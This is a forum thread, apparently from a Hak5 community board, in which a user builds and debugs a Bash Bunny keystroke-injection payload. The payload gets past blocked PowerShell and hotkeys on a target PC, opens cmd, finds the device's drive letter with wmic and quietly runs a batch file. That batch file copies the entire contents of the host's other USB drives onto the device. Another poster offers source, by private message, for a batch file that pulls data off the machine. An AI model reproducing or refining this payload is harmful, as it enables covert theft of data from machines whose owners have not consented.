How run batch file

[Natha_n]

I think the title is pretty self explanatory. I am looking to write a payload that executes a batch file located in the same directory. Thanks to those who will answer.

[dark_pyrro]

So, is this question related to the thread you have already started. If not, describe the scenario and any restrictions (such as not having access to PowerShell as I understand was the limitation in the other thread).

[Natha_n]

Yes it is linked to the other thread: I can't use powershell. I would like to know if there is a command in Bunny script to run a batch file.

[dark_pyrro]

Can you use wmic or is that a limitation as well on your target system?

[Natha_n]

Yes I can use wmic (I use or in m'y batch script). Just powershell.exe is blocked.

[dark_pyrro]

There is no command in Ducky script that I know of that can start a batch script on a Windows host. I guess that you want to store the batch script file that you have posted in the other thread on the Bunny, but you want to execute it in the perspective of the Windows target machine. In other words, the Windows target PC should start the bat file from the Bunny storage. To do this you need to get the drive letter of the Bunny (the way I showed you in the other thread), but not using PowerShell since that's a limitation in your target system. This is possible to do without PowerShell if using wmic. It's not that pretty, but it works.

[lightduty]

If the batch can be execute in one single line that you can execute cmd.exe /c
---------------
This i know the folks at hak5.org don't know this trick but you can execute a batch that automatically will upload files from the machine or execute batch to get as much data as you can. (I have the source) pm me. 

[Natha_n]

I wrote the payload.txt and the script.bat. Can you tell me if they are correct. For the payload I don't know how to use the switch position (I got it but I didn't use it after)

payload.txt

DUCKY_LANG us
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
GUI
DELAY 100
STRING cmd.exe
ENTER
DELAY 100
STRING for /f "tokens=2 delims==" %b IN ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') DO SET letter_BashBunny=%b
ENTER
STRING %letter_BashBunny%
ENTER
STRING cd %letter_BashBunny%\payloads\
ENTER
STRING start /min script.bat
ENTER
STRING exit
ENTER
LED FINISH

script.bat

@echo off
MKDIR %~dp0\copy_directory
FOR /F "tokens=2 delims==" %%u IN ('wmic volume where "drivetype=2 and label<>'BashBunny'" get driveletter /format:list') DO (
    SET usb_key=%%u
    XCOPY /C /Q /G /Y /E "%usb_key%" "%~d0\copy_directory\"
)

Thaks for your replies !

[dark_pyrro]

Haven't you tried to run the payload? That will tell you if it's correct or not. Why would you want to use GET SWITCH_POSITION in this specific case?

[Natha_n]

I thought we had to get the switch position so that the bashbunny knows which payload to execute.

[dark_pyrro]

That is set the "hardware way" using the physical switch of the Bunny. In other words, if you put the Bunny in switch position 1, it will execute the payload in the switch1 directory.

[Natha_n]

Ok. Thanks.

[Natha_n]

Hi,
After many attempts and a lot of reading on the subject, I don't understand why my payload does not work.
Everything runs normally until you type the command in the cmd.

command:

Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b

 

If I do another command like cls it works.
Do you have an idea ?

 

ATTACKMODE HID STORAGE
LED R
Q GUI
Q DELAY 100
Q STRING cmd.exe
Q ENTER
Q DELAY 100
Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b
Q ENTER
Q DELAY 5
Q STRING %letter_BashBunny%
Q ENTER
Q DELAY 5
Q STRING cd %letter_BashBunny%\payloads\
Q ENTER
Q DELAY5
Q STRING start /min script.bat
Q ENTER
Q DELAY 5
Q STRING exit
Q ENTER
LED G

 

[dark_pyrro]

Why are you just using "Q GUI" and not "Q GUI r"? DELAY 5 is a really short delay, almost so short it's not worth putting it there. Even 100 can be short. You also have a DELAY5 that should be DELAY 5.

[Natha_n]

I can't use GUI r because hotkeys are blocked. I will try to lengthen the delay but from the first command, no text is entered in the cmd.

[dark_pyrro]

You most likely have to use quotes and escape special chars using \ to get that string to work

[Natha_n]

That's what I thought about doing but couldn't find any documentation on it. I put " " at the beginning and at the end but for the \ I use it for the " the ' ? the / ?

[dark_pyrro]

The Ducky script documentation is a bit scattered around according to me. If you use the Croc, that also use Ducky script, it's a bit easier to find since you most often remember that you have seen it somewhere. Payloads on GitHub may also be a source of knowledge.

The Croc documentation has some info about escaping chars, not complete though as I see it, but always something.

https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands

Other than that, it's all about trying. Trial and error has worked before in computing history and is still alive as a working method.